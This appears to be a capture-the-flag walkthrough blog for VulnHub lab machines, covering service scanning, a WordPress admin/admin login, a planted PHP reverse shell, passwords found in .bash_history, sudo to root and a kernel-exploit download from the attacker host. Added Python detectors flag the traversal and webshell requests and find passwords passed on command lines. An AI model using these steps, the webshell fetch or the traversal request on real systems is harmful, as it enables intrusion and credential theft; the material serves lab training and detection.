```

window 1
```
Linux red.initech 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 i686 i686 GNU/Linux
 20:37:56 up  7:59,  0 users,  load average: 0.00, 0.01, 0.05
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python -c "import pty;pty.spawn('/bin/bash')"
www-data@red:/$
```
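Both request patterns used above (the admin-ajax.php ave_publishPost call with `thumb=../`, and PHP requested straight out of wp-content/uploads/ such as shell.php?cmd= and reverse.php) leave clear traces in the web server's access log. The detector below is an added example, not from the original post or from WPScan; the log lines it runs over are constructed to mirror this page's requests, with invented timestamps and an invented second client IP.

```python
"""Flag the request patterns used in this walkthrough in Apache access logs.

Added example (not from the original post). SAMPLE_LOG is constructed to
mirror the requests shown on this page: the ave_publishPost handler with a
traversal in `thumb`, and PHP executed from wp-content/uploads/.
"""
import re
from typing import Dict, List
from urllib.parse import parse_qs, unquote, urlsplit

# Apache "combined" format, reduced to the fields this check needs.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) \S+" (?P<status>\d{3}) '
)
TRAVERSAL = re.compile(r"(\.\./|\.\.\\|%2e%2e%2f)", re.IGNORECASE)
SCRIPT_EXT = (".php", ".phtml", ".php5", ".phar")


def analyse(line: str) -> Dict[str, str]:
    """Return a finding for one log line, or {} when nothing matched."""
    m = LOG_RE.match(line)
    if not m:
        return {}
    url = urlsplit(m["url"])
    path = unquote(url.path).lower()
    query = parse_qs(url.query, keep_blank_values=True)
    base = {"ip": m["ip"], "ts": m["ts"], "url": m["url"], "status": m["status"]}

    # Rule 1: the plugin's ave_publishPost handler given a thumb path that
    # escapes its directory (exactly what the LFI requests above do).
    if path.endswith("/wp-admin/admin-ajax.php") and query.get("action") == ["ave_publishPost"]:
        thumb = unquote(query.get("thumb", [""])[0])
        if TRAVERSAL.search(thumb) or thumb.startswith("/"):
            return {**base, "rule": "ave_publishPost thumb traversal", "detail": thumb}

    # Rule 2: a server-side script requested from the uploads tree, which
    # should only ever serve media (shell.php and reverse.php above).
    if "/wp-content/uploads/" in path and path.endswith(SCRIPT_EXT):
        params = ",".join(sorted(query)) or "-"
        return {**base, "rule": "php executed from uploads", "detail": params}
    return {}


def scan_log(text: str) -> List[Dict[str, str]]:
    """Run analyse() over every line and keep only the hits."""
    return [f for f in (analyse(line) for line in text.splitlines()) if f]


# Constructed log lines; timestamps and the 10.10.10.20 client are invented.
SAMPLE_LOG = """\
10.10.10.3 - - [12/May/2020:05:10:01 -0400] "GET /blogblog/wp-admin/admin-ajax.php?action=ave_publishPost&title=32000&short=rnd&term=rnd&thumb=../wp-config.php HTTP/1.1" 200 41 "-" "curl/7.68.0"
10.10.10.3 - - [12/May/2020:05:10:09 -0400] "GET /blogblog/wp-content/uploads/463030943.jpeg HTTP/1.1" 200 3105 "-" "curl/7.68.0"
10.10.10.3 - - [12/May/2020:06:31:42 -0400] "GET /blogblog/wp-content/uploads/shell.php?cmd=wget+10.10.10.3/reverse.php HTTP/1.1" 200 0 "-" "curl/7.68.0"
10.10.10.3 - - [12/May/2020:06:32:05 -0400] "GET /blogblog/wp-content/uploads/reverse.php HTTP/1.1" 200 0 "-" "curl/7.68.0"
10.10.10.20 - - [12/May/2020:06:40:00 -0400] "GET /blogblog/?p=280 HTTP/1.1" 200 8120 "-" "Mozilla/5.0"
10.10.10.20 - - [12/May/2020:06:41:00 -0400] "GET /blogblog/wp-content/uploads/2016/06/photo.jpg HTTP/1.1" 200 51234 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} {f['rule']}: {f['detail']} ({f['url']})")
```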
shell getchu!

Another way to check WordPress plugins
```
curl https://10.10.10.14:12380/blogblog/wp-content/plugins/ -k -s | html2text
```
## after shell getchu
I looked at cron too.<br>
I tried kernel exploits too.<br>
Nothing really stuck. I had no idea at all.<br>
Finally, this:
```
www-data@red:/home$ cat /.bash_history
cat /.bash_history
exit
free
exit
exit
exit
exit
exit
exit
exit
exit
id
whoami
ls -lah
pwd
ps aux
sshpass -p thisimypassword ssh JKanode@localhost
apt-get install sshpass
sshpass -p JZQuyIN5 peter@localhost
ps -ef
top
kill -9 3747
exit
exit
exit
exit
exit
whoami
exit
exit
exit
exit
exit
exit
exit
exit
exit
id
exit
top
ps aux
exit
exit
exit
exit
cat: peter/.bash_history: Permission denied
top
exit
```
".bash_history", huh...<br>
JKanode had no sudo privileges, but peter did.
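The history file gave up two passwords only because they were passed to sshpass on the command line. The checker below is an added example, not from the original post; it runs that kind of search over a constructed history modelled on the dump above, plus a few other common ways a secret lands in a command line, and masks what it finds so the report itself does not become a second leak.

```python
"""Find credentials passed on the command line in shell history files.

Added example (not from the original post). SAMPLE_HISTORY is constructed
to mirror the lines recovered above (sshpass -p <password> ...) together
with other common command-line secret patterns.
"""
import re
from typing import List, Tuple

# (label, pattern) pairs; group 1 of each pattern captures the secret itself.
SECRET_PATTERNS = [
    ("sshpass -p", re.compile(r"\bsshpass\s+-p\s*(\S+)")),
    ("mysql -p inline", re.compile(r"\bmysql\b[^\n]*?\s-p(\S+)")),
    ("--password= flag", re.compile(r"--password=(\S+)")),
    ("curl -u user:pass", re.compile(r"\bcurl\b[^\n]*?\s-u\s+\S+:(\S+)")),
]


def mask(secret: str) -> str:
    """Keep two leading characters for triage, hide the rest."""
    return secret[:2] + "*" * max(len(secret) - 2, 0)


def find_cli_secrets(history: str) -> List[Tuple[int, str, str]]:
    """Return (line number, rule label, masked secret) for each hit."""
    hits = []
    for lineno, line in enumerate(history.splitlines(), start=1):
        for label, pattern in SECRET_PATTERNS:
            m = pattern.search(line)
            if m:
                hits.append((lineno, label, mask(m.group(1))))
                break  # one finding per line is enough for triage
    return hits


# Constructed history, modelled on the .bash_history dumped above.
# Note that "mysql ... -p" with nothing after -p prompts for the password and
# is therefore not a leak; only an inline value is reported.
SAMPLE_HISTORY = """\
ls -lah
sshpass -p thisimypassword ssh JKanode@localhost
apt-get install sshpass
sshpass -p JZQuyIN5 peter@localhost
mysql -h 10.10.10.14 -u root -p
mysql -u wpuser -pS3cretDbPw wordpress
curl -u deploy:hunter2 https://ci.example.test/api
ps -ef
"""

if __name__ == "__main__":
    for lineno, label, masked in find_cli_secrets(SAMPLE_HISTORY):
        print(f"line {lineno}: {label}: {masked}")
```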
```
ssh peter@10.10.10.14
(snip)
red% sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for peter:
Matching Defaults entries for peter on red:
    lecture=always, env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User peter may run the following commands on red:
    (ALL : ALL) ALL
red% sudo su
➜  peter ls
➜  peter id
uid=0(root) gid=0(root) groups=0(root)
➜  peter cd /root
➜  ~ ls
fix-wordpress.sh  flag.txt  issue  python.sh  wordpress.sql
➜  ~ cat flag.txt
<(Congratulations)>
.-'''''-.
|'-----'|
|-.....-|
| |
| |
,. | |
__.o o
"-. | |
.-O o "-.o O )_,._ | |
( o O o )--.-"
O o"-.'-----'
'--------' ( o O o)
----------
b6b545dc11b7a270f4bad23432190c75162c4a2b
➜  ~ exit
```
## Wrap-up
- I feel I got a light taste of a rabbit hole (still going too easy on myself?)
- Maybe the WordPress theme tampering I've been relying on until now often isn't possible?
vulnhub BTRSys2 v2.1 notes
BTRSys2
The ovf extracted from the Google Drive download didn't boot properly.
The ovf from the vulnhub.com download worked fine.
The VM wasn't getting an IP address, so I selected "recovery mode" at boot and then "network  Enable networking", after which the link came up.
Service enumeration
```
# nmap -p- 10.10.10.13
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-11 07:21 EDT
Nmap scan report for 10.10.10.13
Host is up (0.00015s latency).
Not shown: 65532 closed ports
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:FC:08:3F (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 17.35 seconds

# nmap -p21,22,80 -sV --version-all 10.10.10.13
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-11 07:22 EDT
Nmap scan report for 10.10.10.13
Host is up (0.00051s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
MAC Address: 08:00:27:FC:08:3F (Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.90 seconds
```
Points of interest
- [port 21] ftp vsftpd 3.0.3
- [port 22] ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
- [port 80] http Apache httpd 2.4.18 (Ubuntu)
Details
[port 21] ftp vsftpd 3.0.3
```
# searchsploit vsftpd
----------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                               |  Path
                                                                             | (/usr/share/exploitdb/)
----------------------------------------------------------------------------- ----------------------------------------
vsftpd 2.0.5 - 'CWD' (Authenticated) Remote Memory Consumption               | exploits/linux/dos/5814.pl
vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Service (1)               | exploits/windows/dos/31818.sh
vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Service (2)               | exploits/windows/dos/31819.pl
vsftpd 2.3.2 - Denial of Service                                             | exploits/linux/dos/16270.c
vsftpd 2.3.4 - Backdoor Command Execution (Metasploit)                       | exploits/unix/remote/17491.rb
----------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result
```
Nothing applicable.
```
# ftp 10.10.10.13
Connected to 10.10.10.13.
220 (vsFTPd 3.0.3)
Name (10.10.10.13:root):
331 Please specify the password.
Password:
530 Login incorrect.
Login failed.
ftp> ls
530 Please login with USER and PASS.
```
Login required, so that's it for FTP.
[port 22] ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
I've seen this version before; as I recall the only exploit for it is username enumeration, and its accuracy was poor.
Done.
[port 80] http Apache httpd 2.4.18 (Ubuntu)
```
# nikto -h 10.10.10.13
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.13
+ Target Hostname:    10.10.10.13
+ Target Port:        80
+ Start Time:         2020-05-11 07:30:36 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Entry '/wordpress/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 2 entries which should be manually viewed.
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Server may leak inodes via ETags, header found with file /, inode: 51, size: 54e208f152180, mtime: gzip
+ Allowed HTTP Methods: OPTIONS, GET, HEAD, POST
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7865 requests: 0 error(s) and 9 item(s) reported on remote host
+ End Time:           2020-05-11 07:31:40 (GMT-4) (64 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
```
robots.txt is worth a look.
```
# dirb http://10.10.10.13

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Mon May 11 07:32:16 2020
URL_BASE: http://10.10.10.13/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://10.10.10.13/ ----
+ http://10.10.10.13/index.html (CODE:200|SIZE:81)
==> DIRECTORY: http://10.10.10.13/javascript/
+ http://10.10.10.13/LICENSE (CODE:200|SIZE:1672)
+ http://10.10.10.13/robots.txt (CODE:200|SIZE:1451)
+ http://10.10.10.13/server-status (CODE:403|SIZE:299)
==> DIRECTORY: http://10.10.10.13/upload/
==> DIRECTORY: http://10.10.10.13/wordpress/

---- Entering directory: http://10.10.10.13/javascript/ ----
==> DIRECTORY: http://10.10.10.13/javascript/jquery/

---- Entering directory: http://10.10.10.13/upload/ ----
==> DIRECTORY: http://10.10.10.13/upload/account/
==> DIRECTORY: http://10.10.10.13/upload/admins/
==> DIRECTORY: http://10.10.10.13/upload/framework/
==> DIRECTORY: http://10.10.10.13/upload/include/
+ http://10.10.10.13/upload/index.php (CODE:500|SIZE:67)
==> DIRECTORY: http://10.10.10.13/upload/languages/
==> DIRECTORY: http://10.10.10.13/upload/media/
==> DIRECTORY: http://10.10.10.13/upload/modules/
==> DIRECTORY: http://10.10.10.13/upload/page/
==> DIRECTORY: http://10.10.10.13/upload/search/
==> DIRECTORY: http://10.10.10.13/upload/temp/
==> DIRECTORY: http://10.10.10.13/upload/templates/

---- Entering directory: http://10.10.10.13/wordpress/ ----
+ http://10.10.10.13/wordpress/index.php (CODE:301|SIZE:0)
==> DIRECTORY: http://10.10.10.13/wordpress/wp-admin/
==> DIRECTORY: http://10.10.10.13/wordpress/wp-content/
==> DIRECTORY: http://10.10.10.13/wordpress/wp-includes/
+ http://10.10.10.13/wordpress/xmlrpc.php (CODE:200|SIZE:42)

---- Entering directory: http://10.10.10.13/javascript/jquery/ ----
+ http://10.10.10.13/javascript/jquery/jquery (CODE:200|SIZE:284394)

---- Entering directory: http://10.10.10.13/upload/account/ ----
==> DIRECTORY: http://10.10.10.13/upload/account/css/
+ http://10.10.10.13/upload/account/index.php (CODE:500|SIZE:67)
==> DIRECTORY: http://10.10.10.13/upload/account/templates/

---- Entering directory: http://10.10.10.13/upload/admins/ ----
==> DIRECTORY: http://10.10.10.13/upload/admins/access/
==> DIRECTORY: http://10.10.10.13/upload/admins/addons/
==> DIRECTORY: http://10.10.10.13/upload/admins/admintools/
==> DIRECTORY: http://10.10.10.13/upload/admins/groups/
+ http://10.10.10.13/upload/admins/index.php (CODE:500|SIZE:67)
==> DIRECTORY: http://10.10.10.13/upload/admins/interface/
==> DIRECTORY: http://10.10.10.13/upload/admins/languages/
==> DIRECTORY: http://10.10.10.13/upload/admins/login/
==> DIRECTORY: http://10.10.10.13/upload/admins/logout/
==> DIRECTORY: http://10.10.10.13/upload/admins/media/
==> DIRECTORY: http://10.10.10.13/upload/admins/modules/
==> DIRECTORY: http://10.10.10.13/upload/admins/pages/
==> DIRECTORY: http://10.10.10.13/upload/admins/preferences/
==> DIRECTORY: http://10.10.10.13/upload/admins/profiles/
==> DIRECTORY: http://10.10.10.13/upload/admins/service/
==> DIRECTORY: http://10.10.10.13/upload/admins/settings/
==> DIRECTORY: http://10.10.10.13/upload/admins/start/
==> DIRECTORY: http://10.10.10.13/upload/admins/support/
==> DIRECTORY: http://10.10.10.13/upload/admins/templates/
==> DIRECTORY: http://10.10.10.13/upload/admins/users/

---- Entering directory: http://10.10.10.13/upload/framework/ ----
==> DIRECTORY: http://10.10.10.13/upload/framework/functions/
+ http://10.10.10.13/upload/framework/index.php (CODE:500|SIZE:67)

---- Entering directory: http://10.10.10.13/upload/include/ ----
+ http://10.10.10.13/upload/include/index.php (CODE:500|SIZE:67)
==> DIRECTORY: http://10.10.10.13/upload/include/yui/

---- Entering directory: http://10.10.10.13/upload/languages/ ----
+ http://10.10.10.13/upload/languages/index.php (CODE:500|SIZE:67)

---- Entering directory: http://10.10.10.13/upload/media/ ----
+ http://10.10.10.13/upload/media/index.php (CODE:500|SIZE:67)

---- Entering directory: http://10.10.10.13/upload/modules/ ----
+ http://10.10.10.13/upload/modules/admin.php (CODE:500|SIZE:67)
+ http://10.10.10.13/upload/modules/index.php (CODE:500|SIZE:67)
==> DIRECTORY: http://10.10.10.13/upload/modules/news/
==> DIRECTORY: http://10.10.10.13/upload/modules/wysiwyg/

---- Entering directory: http://10.10.10.13/upload/page/ ----
+ http://10.10.10.13/upload/page/index.php (CODE:500|SIZE:67)
==> DIRECTORY: http://10.10.10.13/upload/page/posts/

---- Entering directory: http://10.10.10.13/upload/search/ ----
+ http://10.10.10.13/upload/search/index.php (CODE:500|SIZE:67)

---- Entering directory: http://10.10.10.13/upload/temp/ ----
+ http://10.10.10.13/upload/temp/index.php (CODE:500|SIZE:67)
==> DIRECTORY: http://10.10.10.13/upload/temp/search/

---- Entering directory: http://10.10.10.13/upload/templates/ ----
==> DIRECTORY: http://10.10.10.13/upload/templates/blank/
+ http://10.10.10.13/upload/templates/index.php (CODE:500|SIZE:67)

---- Entering directory: http://10.10.10.13/wordpress/wp-admin/ ----
+ http://10.10.10.13/wordpress/wp-admin/admin.php (CODE:302|SIZE:0)
==> DIRECTORY: http://10.10.10.13/wordpress/wp-admin/css/
==> DIRECTORY: http://10.10.10.13/wordpress/wp-admin/images/
==> DIRECTORY: http://10.10.10.13/wordpress/wp-admin/includes/
+ http://10.10.10.13/wordpress/wp-admin/index.php (CODE:302|SIZE:0)
==> DIRECTORY: http://10.10.10.13/wordpress/wp-admin/js/
==> DIRECTORY: http://10.10.10.13/wordpress/wp-admin/maint/
==> DIRECTORY: http://10.10.10.13/wordpress/wp-admin/network/
==> DIRECTORY: http://10.10.10.13/wordpress/wp-admin/user/

---- Entering directory: http://10.10.10.13/wordpress/wp-content/ ----
+ http://10.10.10.13/wordpress/wp-content/index.php (CODE:200|SIZE:0)
==> DIRECTORY: http://10.10.10.13/wordpress/wp-content/plugins/
==> DIRECTORY: http://10.10.10.13/wordpress/wp-content/themes/
==> DIRECTORY: http://10.10.10.13/wordpress/wp-content/upgrade/
==> DIRECTORY: http://10.10.10.13/wordpress/wp-content/uploads/

---- Entering directory: http://10.10.10.13/wordpress/wp-includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.13/upload/account/css/ ----
+ http://10.10.10.13/upload/account/css/index.php (CODE:500|SIZE:67)

---- Entering directory: http://10.10.10.13/upload/account/templates/ ----
+ http://10.10.10.13/upload/account/templates/index.php (CODE:500|SIZE:67)

---- Entering directory: http://10.10.10.13/upload/admins/access/ ----
+ http://10.10.10.13/upload/admins/access/index.php (CODE:500|SIZE:67)

---- Entering directory: http://10.10.10.13/upload/admins/addons/ ----
+ http://10.10.10.13/upload/admins/addons/index.php (CODE:500|SIZE:67)

---- Entering directory: http://10.10.10.13/upload/admins/admintools/ ----
+ http://10.10.10.13/upload/admins/admintools/index.php (CODE:500|SIZE:67)

---- Entering directory: http://10.10.10.13/upload/admins/groups/ ----
+ http://10.10.10.13/upload/admins/groups/index.php (CODE:500|SIZE:67)

---- Entering directory: http://10.10.10.13/upload/admins/interface/ ----
+ http://10.10.10.13/upload/admins/interface/index.php (CODE:500|SIZE:67)

---- Entering directory: http://10.10.10.13/upload/admins/languages/ ----
+ http://10.10.10.13/upload/admins/languages/index.php (CODE:500|SIZE:67)

---- Entering directory: http://10.10.10.13/upload/admins/login/ ----
==> DIRECTORY: http://10.10.10.13/upload/admins/login/forgot/
+ http://10.10.10.13/upload/admins/login/index.php (CODE:500|SIZE:67)

---- Entering directory: http://10.10.10.13/upload/admins/logout/ ----
+ http://10.10.10.13/upload/admins/logout/index.php (CODE:500|SIZE:67)

---- Entering directory: http://10.10.10.13/upload/admins/media/ ----
+ http://10.10.10.13/upload/admins/media/index.php (CODE:500|SIZE:67)

---- Entering directory: http://10.10.10.13/upload/admins/modules/ ----
+ http://10.10.10.13/upload/admins/modules/index.php (CODE:500|SIZE:67)

---- Entering directory: http://10.10.10.13/upload/admins/pages/ ----
+ http://10.10.10.13/upload/admins/pages/index.php (CODE:500|SIZE:67)

---- Entering directory: http://10.10.10.13/upload/admins/preferences/ ----
+ http://10.10.10.13/upload/admins/preferences/index.php (CODE:500|SIZE:67)

---- Entering directory: http://10.10.10.13/upload/admins/profiles/ ----
+ http://10.10.10.13/upload/admins/profiles/index.php (CODE:500|SIZE:0)

---- Entering directory: http://10.10.10.13/upload/admins/service/ ----
+ http://10.10.10.13/upload/admins/service/index.php (CODE:500|SIZE:67)

---- Entering directory: http://10.10.10.13/upload/admins/settings/ ----
+ http://10.10.10.13/upload/admins/settings/index.php (CODE:500|SIZE:67)

---- Entering directory: http://10.10.10.13/upload/admins/start/ ----
+ http://10.10.10.13/upload/admins/start/index.php (CODE:500|SIZE:67)

---- Entering directory: http://10.10.10.13/upload/admins/support/ ----
+ http://10.10.10.13/upload/admins/support/index.php (CODE:500|SIZE:67)

---- Entering directory: http://10.10.10.13/upload/admins/templates/ ----
+ http://10.10.10.13/upload/admins/templates/index.php (CODE:500|SIZE:67)

---- Entering directory: http://10.10.10.13/upload/admins/users/ ----
+ http://10.10.10.13/upload/admins/users/index.php (CODE:500|SIZE:67)

---- Entering directory: http://10.10.10.13/upload/framework/functions/ ----
+ http://10.10.10.13/upload/framework/functions/index.php (CODE:500|SIZE:67)

---- Entering directory: http://10.10.10.13/upload/include/yui/ ----
==> DIRECTORY: http://10.10.10.13/upload/include/yui/event/
+ http://10.10.10.13/upload/include/yui/index.php (CODE:500|SI
ZE:67)
+ http://10.10.10.13/upload/include/yui/README (CODE:200|SIZE:8488)
==> DIRECTORY: http://10.10.10.13/upload/include/yui/yahoo/

---- Entering directory: http://10.10.10.13/upload/modules/news/ ----
==> DIRECTORY: http://10.10.10.13/upload/modules/news/css/
+ http://10.10.10.13/upload/modules/news/index.php (CODE:500|SIZE:67)
+ http://10.10.10.13/upload/modules/news/info.php (CODE:500|SIZE:67)
==> DIRECTORY: http://10.10.10.13/upload/modules/news/languages/
==> DIRECTORY: http://10.10.10.13/upload/modules/news/templates/

---- Entering directory: http://10.10.10.13/upload/modules/wysiwyg/ ----
+ http://10.10.10.13/upload/modules/wysiwyg/index.php (CODE:500|SIZE:67)
+ http://10.10.10.13/upload/modules/wysiwyg/info.php (CODE:500|SIZE:67)
==> DIRECTORY: http://10.10.10.13/upload/modules/wysiwyg/languages/
==> DIRECTORY: http://10.10.10.13/upload/modules/wysiwyg/templates/

---- Entering directory: http://10.10.10.13/upload/page/posts/ ----
+ http://10.10.10.13/upload/page/posts/index.php (CODE:302|SIZE:0)

---- Entering directory: http://10.10.10.13/upload/temp/search/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.13/upload/templates/blank/ ----
+ http://10.10.10.13/upload/templates/blank/index.php (CODE:500|SIZE:67)
+ http://10.10.10.13/upload/templates/blank/info.php (CODE:500|SIZE:67)

---- Entering directory: http://10.10.10.13/wordpress/wp-admin/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.13/wordpress/wp-admin/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.13/wordpress/wp-admin/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.13/wordpress/wp-admin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.13/wordpress/wp-admin/maint/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.13/wordpress/wp-admin/network/ ----
+ http://10.10.10.13/wordpress/wp-admin/network/admin.php (CODE:302|SIZE:0)
+ http://10.10.10.13/wordpress/wp-admin/network/index.php (CODE:302|SIZE:0)

---- Entering directory: http://10.10.10.13/wordpress/wp-admin/user/ ----
+ http://10.10.10.13/wordpress/wp-admin/user/admin.php (CODE:302|SIZE:0)
+ http://10.10.10.13/wordpress/wp-admin/user/index.php (CODE:302|SIZE:0)

---- Entering directory: http://10.10.10.13/wordpress/wp-content/plugins/ ----
+ http://10.10.10.13/wordpress/wp-content/plugins/index.php (CODE:200|SIZE:0)

---- Entering directory: http://10.10.10.13/wordpress/wp-content/themes/ ----
+ http://10.10.10.13/wordpress/wp-content/themes/index.php (CODE:200|SIZE:0)

---- Entering directory: http://10.10.10.13/wordpress/wp-content/upgrade/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.13/wordpress/wp-content/uploads/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
```
(Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://10.10.10.13/upload/admins/login/forgot/ ---- + http://10.10.10.13/upload/admins/login/forgot/index.php (CODE:500|SIZE:67) ---- Entering directory: http://10.10.10.13/upload/include/yui/event/ ---- + http://10.10.10.13/upload/include/yui/event/index.php (CODE:500|SIZE:67) + http://10.10.10.13/upload/include/yui/event/README (CODE:200|SIZE:9807) ---- Entering directory: http://10.10.10.13/upload/include/yui/yahoo/ ---- + http://10.10.10.13/upload/include/yui/yahoo/index.php (CODE:500|SIZE:67) + http://10.10.10.13/upload/include/yui/yahoo/README (CODE:200|SIZE:2889) ---- Entering directory: http://10.10.10.13/upload/modules/news/css/ ---- + http://10.10.10.13/upload/modules/news/css/index.php (CODE:500|SIZE:67) ---- Entering directory: http://10.10.10.13/upload/modules/news/languages/ ---- + http://10.10.10.13/upload/modules/news/languages/index.php (CODE:500|SIZE:67) ---- Entering directory: http://10.10.10.13/upload/modules/news/templates/ ---- ==> DIRECTORY: http://10.10.10.13/upload/modules/news/templates/backend/ + http://10.10.10.13/upload/modules/news/templates/index.php (CODE:500|SIZE:67) ---- Entering directory: http://10.10.10.13/upload/modules/wysiwyg/languages/ ---- + http://10.10.10.13/upload/modules/wysiwyg/languages/index.php (CODE:500|SIZE:67) ---- Entering directory: http://10.10.10.13/upload/modules/wysiwyg/templates/ ---- + http://10.10.10.13/upload/modules/wysiwyg/templates/index.php (CODE:500|SIZE:67) ---- Entering directory: http://10.10.10.13/upload/modules/news/templates/backend/ ---- + http://10.10.10.13/upload/modules/news/templates/backend/index.php (CODE:500|SIZE:67) ----------------- END_TIME: Mon May 11 07:34:12 2020 DOWNLOADED: 267496 - FOUND: 71
An unusually information-dense dirb result.
The directories of interest are mainly /upload/ and /wordpress/.
First, check /robots.txt.
# curl 10.10.10.13/robots.txt
Disallow: Hackers
Allow: /wordpress/
(the rest of the file is an ASCII-art banner)
Nothing new learned from it.
Opening the home page in a browser again shows a GIF of something wriggling.
Accessing /upload/ returns:
Connection failed: SQLSTATE[HY000] [1049] Unknown database 'Lepton'
So PHP is failing to connect to its MySQL database (the database name and the admins/modules/framework/templates layout found by dirb look like a LEPTON CMS install, but that is a guess).
Either way, /upload/ goes no further: with no database the application cannot even render a login page.
So, check /wordpress/.
The page renders without loading the real WordPress theme, it seems (the stylesheet is not applied).
Log in , admin
There is a "Log in" link, so try admin/admin.
Oh, the login went through, so from Appearance -> Editor edit a PHP file that is easy to reach. (This editor only exists when wp-config.php does not set DISALLOW_FILE_EDIT; on a hardened site it is gone, which is the one-line fix for this whole step.)
A matter of taste, but I like putting the reverse shell in search.php; it is easy to understand.
The reverse shell is the usual pentestmonkey one.
On Kali it is at /usr/share/webshells/php/php-reverse-shell.php.
This time search.php did not fire (by design?), so I modified comment.php instead to get the reverse shell.
window 1
# nc -nlvp 8080
From Firefox, post a comment on any article (the theme's comment template then executes the modified PHP).
window 1
Linux ubuntu 4.4.0-62-generic #83-Ubuntu SMP Wed Jan 18 14:10:15 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
 14:43:02 up 1:24, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ whoami
www-data
$
shell getchu!
after shell getchu
kernel exploit
No suspicious files at all, and nothing notable in cron either.
No choice but to go for a kernel exploit.
victim
$ uname -a
Linux ubuntu 4.4.0-62-generic #83-Ubuntu SMP Wed Jan 18 14:10:15 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux

attacker
# searchsploit ubuntu 4.4
Exploit Title | Path (/usr/share/exploitdb/)
(snip)
Linux Kernel 4.4.0 (Ubuntu) - DCCP Double-Free Privilege Escalation | exploits/linux/local/41458.c
(snip)
Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation | exploits/linux/local/44298.c
The ones that looked like they might land.
Try 41458.c first.
$ cd /tmp
$ ls
systemd-private-e3dcc1d4513d43829d1acfaa9a909496-systemd-timesyncd.service-y9dsiU
$ wget 10.10.10.3/41458.c
--2020-05-11 15:17:10-- http://10.10.10.3/41458.c
Connecting to 10.10.10.3:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16554 (16K) [text/plain]
Saving to: '41458.c'
0K .......... ...... 100% 46.3M=0s
2020-05-11 15:17:10 (46.3 MB/s) - '41458.c' saved [16554/16554]
$ ls
41458.c systemd-private-e3dcc1d4513d43829d1acfaa9a909496-systemd-timesyncd.service-y9dsiU
$ gcc 41458.c
/bin/sh: 7: gcc: not found
What, no gcc on the box.
